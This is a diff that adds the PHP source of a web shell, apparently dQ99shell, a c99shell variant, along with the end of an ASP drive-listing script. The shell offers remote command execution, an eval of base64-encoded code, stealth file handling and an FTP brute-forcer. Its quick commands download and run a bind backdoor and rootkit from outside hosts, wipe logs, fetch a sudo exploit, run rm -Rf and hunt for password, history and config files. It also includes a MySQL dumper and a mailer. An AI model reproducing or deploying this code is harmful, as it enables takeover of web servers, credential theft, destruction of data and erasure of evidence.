        " + Response.write ";" + if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]" + if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]" + if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]" + if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]" + Response.Write "
        " + Response.write "H Local Path" + Response.Write "

        " +end if +%> +
        µ
        +
        µ
        +
        µ
        +
        µ
\ No newline at end of file
diff --git a/php/dq.php b/php/dq.php
new file mode 100644
index 0000000..fa64d93
--- /dev/null
+++ b/php/dq.php
@@ -0,0 +1,3112 @@ + array($sh_mainurl."readme.txt","kiddie.php"), + "psyBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"), + "Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"), + "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"), +); +##[ AUTHENTICATION ]## +$auth = array( + "login" => "", + "pass" => "", + "md5pass" => "", + "hostallow" => array("*"), + "denied" => "".$sh_name.": access denied!", +); +##[ END AUTHENTICATION ]## +$curdir = "./"; +$tmpdir = ""; +$tmpdir_logs = "./"; +$log_email = "ayam@jago.us"; #Email logna +$sess_cookie = "dQ99shcook"; +$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending +$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies. +$usefsbuff = TRUE; +$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste +$surl_autofill_include = TRUE; +$updatenow = FALSE; +$gzipencode = TRUE; +$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses. +$hexdump_lines = 8; +$hexdump_rows = 24; +$millink = milw0rm(); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +$disablefunc = getdisfunc(); +##[ END OF CONFIGS ]## +error_reporting(E_ERROR | E_PARSE); +@ini_set("max_execution_time",0); +@set_time_limit(0); #No dQ in SafeMode +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) { strips($GLOBALS); } +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +@$f = $_REQUEST["f"]; +@extract($_REQUEST["dQ99shcook"]); +foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } } +$dQbuff = "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"; eval(base64_decode($dQbuff)); +if ($surl_autofill_include) { + $include = "&"; + foreach (explode("&",getenv("QUERY_STRING")) as $v) { + $v = explode("=",$v); + $name = urldecode($v[0]); + $value = @urldecode($v[1]); + foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) { + if (strpos($value,$needle) === 0) { + $includestr .= 
urlencode($name)."=".urlencode($value)."&"; + } + } + } +} +if (empty($surl)) { + $surl = "?".$includestr; + $surl = htmlspecialchars($surl); +} +## FILE TYPES ## +$ftypes = array( + "html" => array("html","htm","shtml"), + "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe" => array("sh","install","bat","cmd"), + "ini" => array("ini","inf","conf"), + "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb" => array("sdb"), + "phpsess" => array("sess"), + "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), + array("\.tgz$",1,"",""), + array("\.gz$",1,"",""), + array("\.tar$",1,"",""), + array("\.bz2$",1,"",""), + array("\.zip$",1,"",""), + array("\.rar$",1,"",""), + array("\.php$",1,"",""), + array("\.php3$",1,"",""), + array("\.php4$",1,"",""), + array("\.jpg$",1,"",""), + array("\.jpeg$",1,"",""), + array("\.JPG$",1,"",""), + array("\.JPEG$",1,"",""), + array("\.ico$",1,"",""), + array("\.gif$",1,"",""), + array("\.png$",1,"",""), + array("\.htm$",1,"",""), + array("\.html$",1,"",""), + array("\.txt$",1,"","") +); +## QUICK COMMANDS ## +if (!$win) { + $cmdaliases = array( + array("", "ls -al"), + array("Find all suid files", "find / -type f -perm -04000 -ls"), + array("Find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("Find all sgid files", "find / -type f -perm -02000 -ls"), + array("Find sgid files in current dir", "find . 
-type f -perm -02000 -ls"), + array("Find config.inc.php files", "find / -type f -name config.inc.php"), + array("Find config* files", "find / -type f -name \"config*\""), + array("Find config* files in current dir", "find . -type f -name \"config*\""), + array("Find all writable folders and files", "find / -perm -2 -ls"), + array("Find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("Find all writable folders", "find / -type d -perm -2 -ls"), + array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"), + array("Find all service.pwd files", "find / -type f -name service.pwd"), + array("Find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("Find all .htpasswd files", "find / -type f -name .htpasswd"), + array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("Find all .bash_history files", "find / -type f -name .bash_history"), + array("Find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("Find .fetchmailrc files in current dir", "find . 
-type f -name .fetchmailrc"), + array("List file attributes on a Linux second extended file system", "lsattr -va"), + array("Show opened ports", "netstat -an | grep -i listen") + ); + $cmdaliases2 = array( + array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"), + array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"), + array("-----",""), + array("Logged in users","w"), + array("Last to connect","lastlog"), + array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), + array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), + array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), + array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), + array("CPU Info","cat /proc/version /proc/cpuinfo"), + array("Is gcc installed ?","locate gcc"), + array("Format box (DANGEROUS)","rm -Rf"), + array("-----",""), + array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"), + array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"), + array("Run WIPELOGS PT3","./zap2"), + array("-----",""), + array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"), + array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"), + array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"), + ); +} +else { + $cmdaliases = array( + array("", "dir"), + array("Find index.php in current dir", "dir /s /w /b index.php"), + array("Find *config*.php in current dir", "dir /s /w /b *config*.php"), + array("Find c99shell in current dir", "find /c \"c99\" *"), + array("Find r57shell in current dir", "find /c \"r57\" *"), + array("Find dQ99shell in current dir", "find /c \"dQ99\" *"), + array("Show active connections", "netstat -an"), + array("Show running services", "net start"), + 
array("User accounts", "net user"), + array("Show computers", "net view"), + ); +} +## PHP FILESYSTEM TRICKS (By diKi) ## +$phpfsaliases = array( + array("Read File", "read", 1, "File", ""), + array("Write File (PHP5)", "write", 2, "File","Text"), + array("Copy", "copy", 2, "From", "To"), + array("Rename/Move", "rename", 2, "File", "To"), + array("Delete", "delete", 1 ,"File", ""), + array("Make Dir","mkdir", 1, "Dir", ""), + array("Download", "download", 2, "URL", "To"), + array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"), + array("Change Perm (0755)", "chmod", 2, "File", "Perms"), + array("Find Writable Dir", "fwritabledir", 2 ,"Dir"), + array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"), +); +## QUICK LAUNCH ## +$quicklaunch1 = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"Up\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d") +); +$quicklaunch2 = array( + array("Security Info",$surl."act=security&d=%d"), + array("Processes",$surl."act=processes&d=%d"), + array("MySQL",$surl."act=sql&d=%d"), + array("Eval",$surl."act=eval&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Mailer",$surl."act=dQmailer"), + array("milw0rm",$millink), + array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"), + array("Toolz",$surl."act=tools&d=%d"), + array("Kill-Shell",$surl."act=selfremove"), + array("Feedback",$surl."act=feedback"), + array("Update",$surl."act=update"), + array("About",$surl."act=about") +); +if (!$win) { + $quicklaunch2[] = array("
        FTP-Brute",$surl."act=ftpquickbrute&d=%d"); +} +## HIGHLIGHT CODE ## +$highlight_background = "#C0C0C0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; +#################### +##[ AUTHENTICATE ]## +#################### +$tmp = array(); +foreach ($auth["hostallow"] as $k => $v) { + $tmp[] = str_replace("\\*",".*",preg_quote($v)); +} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) { + exit("$sh_name: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed"); +} +if (!empty($auth["login"])) { + if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); } + if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) { + header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\""); + header("HTTP/1.0 401 Unauthorized"); + die($auth["denied"]); + } +} +## END AUTHENTICATE ## + +if ($act != "img") { + $lastdir = realpath("."); + chdir($curdir); + if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; } + $sess_data = @unserialize($_COOKIE["$sess_cookie"]); + if (!is_array($sess_data)) { $sess_data = array(); } + if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } + if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } + dQ99_buff_prepare(); + foreach (array("sort","sql_sort") as $v) { + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} + } + if ($sort_save) { + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} + } + if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} + if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) 
{function posix_getgrgid($gid) {return FALSE;}} + if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} + if (!function_exists("mysql_dump")) { + function mysql_dump($set) { + global $sh_ver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) { + //Retrieve tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = " + # Dumped by ".$sh_name." + # + # Host settings: + # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." + # Date: ".date("d.m.Y H:i:s")." 
+ # DB: \"".$db."\" + #---------------------------------------------------------"; + $c = count($onlytabs); + foreach($tabs as $tab) { + if ((in_array($tab,$onlytabs)) or (!$c)) { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + //Receieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + //Receieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) { + while ($row = mysql_fetch_assoc($res)) { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; + } + } + if (!function_exists("mysql_buildwhere")) { + function mysql_buildwhere($array,$sep=" and",$functs=array()) { + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; + } + } + if (!function_exists("mysql_fetch_all")) { + function mysql_fetch_all($query,$sock) { + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + 
mysql_free_result($result); + return $array; + } + } + if (!function_exists("mysql_smarterror")) { + function mysql_smarterror($type,$sock) { + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; + } + } + if (!function_exists("mysql_query_form")) { + function mysql_query_form() { + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
        ".$sql_query_error."
        ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) { + echo ""; + if ($tbl_struct) { + echo "
        "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



        Fields:
        "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
        ";} + echo "
        "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} + } + } + if (!function_exists("mysql_create_db")) { + function mysql_create_db($db,$sock="") { + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} + } + } + if (!function_exists("mysql_query_parse")) { + function mysql_query_parse($query) { + $query = trim($query); + $arr = explode (" ",$query); + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) { + foreach($arr as $k=>$v) { + if (strtoupper($v) == "LIMIT") { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} + } + } + if ($act == "gofile") { + if (is_dir($f)) { $act = "ls"; $d = $f; } + else { $act = "f"; $d = dirname($f); $f = basename($f); } + } + ## HEADERS ## + @ob_start(); + @ob_implicit_flush(0); + header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); + header("Last-Modified: ".gmdate("D, d M Y H:i:s")." 
GMT"); + header("Cache-Control: no-store, no-cache, must-revalidate"); + header("Cache-Control: post-check=0, pre-check=0", FALSE); + header("Pragma: no-cache"); + if (empty($tmpdir)) { + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} + } + $tmpdir = realpath($tmpdir); + $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); + if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} + if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} + else {$tmpdir_logs = realpath($tmpdir_logs);} + $sort = htmlspecialchars($sort); + if (empty($sort)) {$sort = $sort_default;} + $sort[1] = strtolower($sort[1]); + $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); + if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} + $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); + @ini_set("highlight.bg",$highlight_bg); + @ini_set("highlight.comment",$highlight_comment); + @ini_set("highlight.default",$highlight_default); + @ini_set("highlight.html",$highlight_html); + @ini_set("highlight.keyword",$highlight_keyword); + @ini_set("highlight.string",$highlight_string); + if (!is_array($actbox)) { $actbox = array(); } + $dspact = $act = htmlspecialchars($act); + $disp_fullpath = $ls_arr = $notls = null; + $ud = @urlencode($d); + if (empty($d)) {$d = realpath(".");} + elseif(realpath($d)) {$d = realpath($d);} + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $d = str_replace("\\\\","\\",$d); + $dispd = htmlspecialchars($d); + $safemode = safemode(); + if ($safemode) { + $hsafemode = "SAFE MODE IS ON"; + $safemodeexecdir = @ini_get("safe_mode_exec_dir"); + } + else { $hsafemode = "SAFE MODE IS OFF"; } + $v = @ini_get("open_basedir"); + if ($v or strtolower($v) == "on") { + $openbasedir = TRUE; + $hopenbasedir = "".$v.""; + } + else { + 
$openbasedir = FALSE; + $hopenbasedir = "OFF (not secure)"; + } + +################## +##[ HTML START ]## +################## +function srv_info($title,$contents) { + echo "

        $title:$contents
        "; +echo "\n"; +echo "\n". + "\n"; +echo "\n"; +echo "\n"; +echo "\n". + "\n
        \n"; +echo "
        $hsafemode
        \n"; +echo "
        "; +echo "IP Address: ".@gethostbyname($_SERVER["HTTP_HOST"])." ". + "You: ".$_SERVER["REMOTE_ADDR"]." ". + ($win?"Drives: ".disp_drives($d,$surl):""); +echo "
        \n
        \n"; +echo "\n"; +srv_info("Software","".$DISP_SERVER_SOFTWARE); +srv_info("Uname",php_uname()); +srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id")); +echo "
        \n"; +echo "\n"; +srv_info("Freespace",disp_freespace($d)); +echo "
        \n"; +echo get_status(); +echo "
        \n"; +echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."
        \n" : ""; +echo showdisfunc() ? "DisFunc: ".showdisfunc()."\n" : ""; +echo "
        "; +echo "

        \n"; +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) { + $t = ""; $j = 0; + foreach ($e as $r) { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) { break; } + $j++; + } + echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR."\n"; + $i++; +} +echo " - "; +if (is_writable($d)) { + $wd = TRUE; + $wdt = "[OK]"; + echo "".view_perms(fileperms($d)).""; +} +else { + $wd = FALSE; + $wdt = "[Read-Only]"; + echo "".view_perms_color($d).""; +} +echo "\n

        \n"; +?> +
        +
        +Directory: +
        +
        +
        +\n"; +if ($act == "") { $act = $dspact = "ls"; } +if ($act == "sql") { + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + echo "

        Attention! MySQL Manager is NOT a ready module! Don't reports bugs.

        ". + "". + ""; + if (!$sql_sock) { + echo ""; +} +echo "
        "; + if ($sql_server) { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo ".: SQL Manager :.
        "; + if (!$sql_sock) { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "Can't connect! ".$err;} + } + else { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
        "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + } + echo "
      • If login is null, login is owner of process.
      • If host is null, host is localhost
      • If port is null, port is 3306 (default)
      • "; + echo ""; + } + else { + //Start left panel + if (!empty($sql_db)) { + ?>
        Please, fill the form:
        UsernamePasswordDatabase
        HostPORT
        ">Home
        + ".htmlspecialchars($sql_db)." ]---
        "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
        "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else { + ?>
        Home
        +

        Please, select database
        +
        "; + //Start center panel + $diplay = TRUE; + if ($sql_db) { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
        There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
        "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
        "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") { + if ($sql_tbl_insert_radio == 1) { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." 
(";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") { + echo "
        "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
        ".$sql_query_error."
        ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
        "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



        ";} + } + if (in_array($sql_act,$acts)) { + ?> +
        Create new table: +
        + + + + + + + + + +
        Dump DB: +
        + + + + + + ">
        + ";} + if ($sql_act == "newtbl") { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { + echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
        "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
        Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") { + if (empty($submit)) { + $diplay = FALSE; + echo "
        SQL-Dump:

        "; + echo "DB:

        "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

        "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

        "; + echo "Download:  

        "; + echo "Save to file:  "; + echo "



        1 - all, if empty"; + echo "
        "; + } + else { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) { + if (!empty($sql_tbl)) { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM 